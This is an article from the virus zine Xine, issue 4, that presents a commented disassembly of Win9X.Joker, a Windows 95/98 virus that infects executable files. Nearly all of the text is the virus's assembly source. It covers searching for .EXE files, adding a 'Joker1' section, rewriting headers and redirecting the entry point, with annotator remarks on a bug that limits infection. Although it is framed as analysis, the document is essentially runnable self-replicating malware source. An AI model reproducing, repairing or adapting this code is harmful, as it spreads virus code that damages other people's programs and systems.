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Xine - issue #4 - Phile 312

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 · 7 months ago

| Xine - issue #4 - Phile 312 |

; ===========================================================================
; Win9X.Joker
; ===========================================================================
; Name : Win9X.Joker (?)
; Version : N/A
; Original Author : Unknown
; Original Size : 940 bytes
; Platform : Win9x
; Kind : Direct action PE infector
; Origin : Unknown
; Dissassembly by : Billy Belceb£/iKX
; Some comments :
; All about this virus is a mistery. It hasn't any sign, or copyright texts,
; so i can't know about who is the author of this virus. If i had to guess it
; basing myself in the coding style, this virus would be from one of this
; three guys: JHB, Murkry or Mark Ludwig. But, i'm not here for suppose the
; authory of this virus, i'm here just for disassemble it :) About the name
; i've given to this virus, it's another supposition: it's the name of the
; section that is added to all infected files by this virus.
; Well, about what this virus does, it's very simple. It searches trough the
; current directory for files, and infects them by adding a new section. The
; virus will only infect two files per run. The new section added will have
; the name of "Joker1", so that's why i called this virus in that way.
; This virus has one enormous bug that will make it to avoid the infection of
; almost all PE files it tries to, anyway the coder of this tiny virus has
; shown good skills, because he does some really clever things. The code is
; not specially optimized but anyway, it's not a problem. The thing that most
; impacted me is the fact that this virus DOESN'T get the delta offset in any
; place. It's, at least, strange :)
; This virus will not be able to spread under NT, because instead of using
; APIs, it only searches for the VxDCall0 API, and uses the Int21_Dispatch
; function of the said API, so the virus is very similar to a DOS infector,
; but under Windows. The problem is that in WinNT that API doesn't exists.
; So, this virus will only be able to replicate in Win95 and Win98 OS.
; The virus doesn't manifest itself in any form, it's harmless.
; This is my third disassembly (and i hope it won't be the last), and the
; first one virus i have disassembled (previously i had disassembled a tunne-
; ling engine and a poly engine). It was done all the 27th of June. Enjoy!
; (c) 1999 Billy Belcebu/iKX
.model flat


dd 0 ; Some data for TLINK

; ---------------------------------------------------------------------------
; Virus data
; ---------------------------------------------------------------------------

virus_size equ 03ACh

buffer equ 0004h
FindData equ 0404h

;typedef struct _WIN32_FIND_DATA {
; DWORD dwFileAttributes;
; FILETIME ftCreationTime; ;DD ?,?
; FILETIME ftLastAccessTime; ;DD ?,?
; FILETIME ftLastWriteTime; ;DD ?,?
; DWORD nFileSizeHigh;
; DWORD nFileSizeLow;
; DWORD dwReserved0;
; DWORD dwReserved1;
; CHAR cFileName[MAX_PATH];
; CHAR cAlternateFileName[ 14 ];

FileSizeHigh equ 0420h
FileSizeLow equ 0424h
FileAttributes equ 0430h

; ---

FileHandle equ 0544h
SearchHandle equ 0548h
ASizeOfRawData equ 054Ch
Ptr2LastSection equ 0550h
AVirusSize equ 0554h
InfCounter equ 0558h
PushImm32 equ 055Ch
OldEIP equ 055Dh
WorkSpace equ 0564h

HostEIP equ 0584h
RetAddress equ 0588h


; ---------------------------------------------------------------------------
; This is the virus code
; ---------------------------------------------------------------------------

push offset first_generation-400000h

; The above coded will be patched during infections

pusha ; Save all registers
sub esp, WorkSpace ; Make space for stack frame
mov ebp, esp ; Save it in EBP
call @@1
@@1: pop eax ; EAX = An address into host own process
call CheckBase ; Get ImageBase of current process
add [ebp+HostEIP], eax

cmp dword ptr [ebp+RetAddress], 0 ; See if NULL return address
jz short ExitVirus

mov eax, [ebp+RetAddress] ; EAX = Return address
call CheckBase

or eax, eax ; Error?
jz ExitVirus ; Shit if so...
mov [ebp+RetAddress], eax

call GetVxDCall0 ; Try to get the VxDCall0
or eax, eax ; Error?
jz ExitVirus ; Shit if so...

mov dword ptr [ebp+InfCounter], 1 ; Set infection counter
call FindFirstFile ; Find a file for infect

InfectAnother: ; ...
or eax, eax ; Error returned?
jz ExitVirus ; Damn...
cmp dword ptr [ebp+InfCounter], 1
ja ExitVirus ; Did we infected one file? If so, go away
call InfectFile ; Infect!
call FindNextFile ; Find another file
jmp InfectAnother

ExitVirus: ; ...
add esp, WorkSpace ; Restore stack frame
popa ; Restore all registers
retn ; And return control to host

; ---------------------------------------------------------------------------
; This routine searches for PE mark in headers (for get ImageBase & K32)
; ---------------------------------------------------------------------------

pusha ; Save all registers
mov ebp, esp ; Make a stack frame

SetSEHandSearch: ; ...
push 4010B4h ; SEH handler address (?)

; BUG! If a fault occurs, this is pointing to a hardcoded address, and it's
; not fixed with delta offset as it should be...

push dword ptr fs:0 ; Save old SEH handler
mov fs:0, esp ; Put the new one
xchg eax, esi

Check4MZ_PE: ; ...
and esi, 0FFFFF000h ; Align to page
pusha ; Save all registers
lodsw ; Get a word
cmp ax, "ZM" ; MZ mark?
jnz continue_search
add esi, [esi+3Ah]
dec esi
dec esi
cmp ax, "EP" ; Check for PE sign...
jz K32_Exit

xor eax, eax
jmp short K32_Exit

continue_search: ; ...
sub esi, 1000h
jmp short Check4MZ_PE
mov eax, [esp+8] ; Fix stack
lea esp, [eax-20h]
pop dword ptr fs:0 ; Restore old SEH handler
inc esp ; Fix stack (shit from new SEH handler)
inc esp
inc esp
inc esp
sub esi, 1000h ; Substract one page...
jmp SetSEHandSearch ; and continue searching!

K32_Exit: ; ...
pop dword ptr fs:0 ; Restore old SEH handler
add esp, 4 ; Clear shit of stack (new SEH handler)
mov [ebp+1Ch], esi ; EAX = ESI after pushad
popa ; Restore all the registers

; ---------------------------------------------------------------------------
; Get the VxDCall0 API from KERNEL32 export table
; ---------------------------------------------------------------------------

push ebx ; Save EBX (used in routine)
push eax ; Save EAX (K32 base address)
mov ebx, [eax+3Ch] ; EBX = Pointer to PE sign
add ebx, eax ; RVA >> VA
mov ebx, [ebx+78h] ; And now lookout in the exports for
lea ebx, [ebx+eax+1Ch] ; the first API exported, that is
mov ebx, [ebx] ; the VxDCall0! :)
add eax, [eax+ebx] ; EAX = VxDCall0 API
mov fs:14h, eax ; Store VxDCall0 into FS:14h address
pop eax ; Restore K32 base address in EAX
pop ebx ; Restore EBX
retn ; Return to caller :)

; ---------------------------------------------------------------------------
; Find the first file in the current directory
; ---------------------------------------------------------------------------

mov ax, 714Eh ; EAX = LFN FindFirstFile funciton
cwde ; Convet word AX into doubleword EAX
call PerformSearch

db "*.EXE",0 ; EXE Wildcard

PerformSearch: ; ...
pop edx ; EDX = ASCIIz wildcard
lea edi, [ebp+FindData] ; EDI = FindData record
xor ecx, ecx ; ECX = Attributes
lea esi, [ecx] ; Date time format
inc esi ; ESI = 1
call Int21h
jnb ExitSearch

xor eax, eax ; Exit with error

ExitSearch: ; ...
mov [ebp+SearchHandle], eax ; Store search handle

; ---------------------------------------------------------------------------
; Find next files
; ---------------------------------------------------------------------------

mov ax, 714Fh ; AX = LFN FindNextFile function
cwde ; Convert word AX into doubleword EAX
lea edi, [ebp+FindData] ; EDI = Pointer to FindData struc
xor esi, esi ; ESI = DataTime format
inc esi
mov ebx, [ebp+SearchHandle] ; EBX = Search handle
call Int21h

jnb ExitFindNextFil
xor eax, eax ; EAX = 0 (Exit with error)

ExitFindNextFil: ; ...

; ---------------------------------------------------------------------------
; Infect the found file
; ---------------------------------------------------------------------------

call OpenFile
jnb continue_inf

xor eax, eax

continue_inf: ; ...
mov [ebp+FileHandle], eax ; Store File Handle
xor ecx, ecx ; ECX = 0
mov ch, 4 ; Read 400h bytes
call ReadFromFile
jb inf_stage2

call CheckValidPE

inf_stage2: ; ...
jb InfError1 ; Error? Damn...

cmp dword ptr [ebp+FileSizeHigh], 0 ; FileSizeHigh = 0?
jnz InfError1 ; If so, too much great for us

cmp dword ptr [ebp+FileSizeLow], 7FFFEFFFh ; File too huge? Shit!
ja InfError1

call @@3
@@3: pop eax
add eax, 13h ; EAX = Offset where jump

call_jump_eax: ; ...
call jump_eax

db "Joker1",0,0 ; The name of the new section

jmp eax

pop eax ; Remove shit from stack
push esi ; Save ESI
xchg eax, esi ; EAX = ESI

lea edi, [ebp+buffer] ; EDI = Beginning of file header
xor ecx, ecx
mov ch, 1 ; Search 400h bytes
repne scasd
pop esi
jz InfError1

mov ax, [esi+6] ; AX = Number of sections
cwde ; Convert Word to DoubleWord
mov ecx, 28h
dec eax
mul ecx
add eax, 0F8h
add eax, esi
xchg eax, edi ; EDI = Pointer to last section
mov [ebp+Ptr2LastSection], edi

mov ebx, [edi+10h] ; EBX = SizeOfRawData
add ebx, [edi+14h] ; EBX = Raw pointer to end of last section
mov eax, ebx ; EAX = EBX
mov ecx, [esi+3Ch] ; ECX = File Alignment
dec eax ; Here it aligns that value
add eax, ecx
xor edx, edx ; EDX = 0
div ecx
mul ecx ; EAX = Aligned value
mov edx, eax ; EDX = EAX
mov [ebp+ASizeOfRawData], edx ; Save it in a variable

mov ecx, eax
shr ecx, 10h ; Convert this to usable by the function
xor al, al ; Move pointer to where we want
call MoveFilePointer ; Do it
jnc ContinueInf

InfError1: ; ...
jmp InfError

ContinueInf: ; ...
mov byte ptr [ebp+PushImm32], 68h ; Put PUSH imm8 opcode
mov edx, [esi+28h] ; EDX = EIP of host
mov [ebp+OldEIP], edx ; Store after push opcode

lea edx, [ebp+PushImm32]
xor ecx, ecx ; ECX = 0
mov cl, 5 ; ECX = 5
call Write2File
jnc Continue2 ; Jump over this if no error

InfError: ; ...
jmp CloseAndQuit ; Shit...

Continue2: ; ...
mov eax, virus_size ; EAX = Virus Size
dec eax ; EAX--
xor edx, edx ; EDX = 0
mov ecx, [esi+3Ch] ; ECX = Alignment factor
add eax, ecx ; Now the virus aligns the virus size
div ecx
mul ecx
xchg eax, ecx
mov [ebp+AVirusSize], ecx ; And saves it into its variable

sub ecx, 5 ; We substract 5 (for PUSH imm32)
call write_virus

call virus_start

pop edx ; EDX = Points to call_data
add edx, [edx+1] ; Add the call address
add edx, 0Ah ; EDX = Data to write
call Write2File ; Write virus body :)

push esi ; Save ESI
mov edi, [ebp+Ptr2LastSection] ; EDI = Pointer after last section
add edi, 28h ; EDI = EDI+28h (size of section header)

call @@2
@@2: pop eax
add eax, 9 ; Jump after this shit, but for one

jmp call_jump_eax ; reason... it returns us in the stack
; a pointer to the name of the new
; section :)

pop esi ; ESI = Points to "Joker1\0\0"

lodsd ; We put the name of the new section
stosd ; It occupies 8 bytes, so... :)

pop esi ; Restore old ESI value
mov eax, [ebp+AVirusSize] ; EAX = Aligned virus size
mov ecx, [esi+38h] ; ECX = Section's alignment
cdq ; EDX = 0
dec eax ; Align virus size to section alignment
add eax, ecx
div ecx
mul ecx
stosd ; Section's VirtualSize

mov eax, [edi-28h] ; Here the virus perform the
add eax, [edi-2Ch] ; necessary actions to know
dec eax ; section's new VirtualAddress
add eax, ecx
div ecx
mul ecx
stosd ; Section's VirtualAddress

push eax ; Store it in stack
mov eax, virus_size ; EAX = VirusSize
mov ecx, [esi+3Ch]
cdq ; EDX = 0
dec eax
add eax, ecx
div ecx
mul ecx
stosd ; Section's SizeOfRawData

mov eax, [ebp+ASizeOfRawData]
stosd ; Section's PointerToRawData

xor eax, eax ; EAX = 0
stosd ; Section's PointerToRelocations
stosd ; Section's PointerToLineNumbers
stosw ; Section's NumberofRelocations

mov eax, 20000020h ; Section's attributes
stosd ; (Text, Writable)
lea esi, [ebp+40h]
lea esi, [ebp+eax+4] ; ESI = Pointer to file header
pop eax ; EAX = New section's VirtualAddress
mov [esi+28h], eax ; Set it as new EntryPoint

inc word ptr [esi+6] ; Increase number of sections

mov eax, [ebp+AVirusSize]
add [esi+1Ch], eax ; Add to SizeOfCode the aligned virus size
mov ebx, [esi+50h] ; EBX = Old SizeOfImage
add eax, ebx ; EAX = Aligned virus size+SizeOfImage
mov ecx, [esi+38h] ; ECX = SectionAlignment
dec eax ; Align VirusSize+SizeOfCode
xor edx, edx ; to the SectionAlignment
add eax, ecx
div ecx
mul ecx
mov [esi+50h], eax ; Store the new SizeOfImage

xor edx, edx ; EDX = 0
mov ecx, edx ; ECX = 0
xor al, al ; AL = 0 (Ptr to wanted position)
call MoveFilePointer

lea edx, [ebp+buffer] ; EDX = Pointer to virus in stack
xor ecx, ecx ; ECX = 0
mov ch, 4 ; Append 400h bytes
call Write2File

inc dword ptr [ebp+InfCounter] ; Increase inf. counter

CloseAndQuit: ; ...
push eax ; Save EAX
call CloseFile ; Close opened file
pop eax ; Restore EAX

; ---------------------------------------------------------------------------
; Get File Attributes
; ---------------------------------------------------------------------------

GetAttributes: ; AX = Function GetFileAttributes
mov ax, 4300h
cwde ; Convert word AX in dword EAX
lea edx, [ebp+FileAttributes] ; EDX = Pointer to file name
call Int21h

; ---------------------------------------------------------------------------
; Move the file pointer to the desired address
; ---------------------------------------------------------------------------

push ebx ; Save EBX
mov ah, 42h ; AH = Function SetFilePointer
cwde ; Convert word AX in dword EAX
xchg al, bl ; AL = Where set pointer
mov ebx, [ebp+FileHandle] ; EBX = File Handle
call Int21h
pop ebx ; Restore EBX

; ---------------------------------------------------------------------------
; Open file for Read/Write
; ---------------------------------------------------------------------------

mov ax, 3D02h ; AX = Open for read/write
cwde ; Convert word AX into dword EAX
lea edx, [ebp+FileAttributes] ; EDX = Pointer filename to open
xor ecx, ecx ; ECX = Attributes
call Int21h

; ---------------------------------------------------------------------------
; Read given bytes from opened file
; ---------------------------------------------------------------------------

mov ax, 3F00h ; AX = ReadFile function
cwde ; Convert word AX into dword EAX
mov ebx, [ebp+FileHandle] ; EBX = File Handle
lea edx, [ebp+buffer] ; EDX = Where put read data
call Int21h

; ---------------------------------------------------------------------------
; Write desired data to opened file
; ---------------------------------------------------------------------------

push ebx ; Save EBX
mov ax, 4000h ; AX = Write function
cwde ; Convert word AX in dword EAX
mov ebx, [ebp+FileHandle] ; EBX = File Handle
call Int21h ; Win9X Int21h's clone
pop ebx ; Restore EBX

; ---------------------------------------------------------------------------
; Close the previously opened file
; ---------------------------------------------------------------------------

mov ax, 3E00h ; AX = Close File function
cwde ; EDX = 0
mov ebx, [ebp+FileHandle] ; EBX = File handle
call Int21h

; ---------------------------------------------------------------------------
; Check for a valid PE file
; ---------------------------------------------------------------------------

push eax
push ecx
lea esi, [ebp+40h] ; Go firstly to 3Ch field in
lodsd ; the PE header, and later check
lea esi, [ebp+eax+4] ; the offset that it marks
lodsw ; and see if points to the
cmp ax, 'EP' ; PE mark :)
jnz ErrorExit
dec esi ; Fix ESI, so it'll point to the
dec esi ; beginning of PE header again

; The number of sections variable is a word in the PE header, not a dword. So
; with the below code, the virus will put some shit in the more significant
; word of EAX, that will make the checks to fail, and return an error instead
; of infecting a file that could be infected :(

mov eax, [esi+6] ; Tries to put in EAX the number
; of sections

; It should be MOVZX EAX,WORD PTR [ESI+6], or MOV AX,[ESI+6] / CWDE

inc eax ; Increase it
mov ecx, 28h
mul ecx
add eax, 0F8h
add eax, [ebp+40h]
cmp eax, 400h ; Section table too big?
ja ErrorExit ; If so, quit with error

GlobalExit: ; ...
pop ecx ; Restore values from stack
pop eax

ErrorExit: ; ...
jmp GlobalExit

; ---------------------------------------------------------------------------
; The pseudo INT 21h
; ---------------------------------------------------------------------------

push ecx
push eax
push 2A0010h
call dword ptr fs:14h

; ---------------------------------------------------------------------------
; First generation fake host
; ---------------------------------------------------------------------------

extrn ExitProcess:PROC

push 0FFh
call ExitProcess
end virus_start

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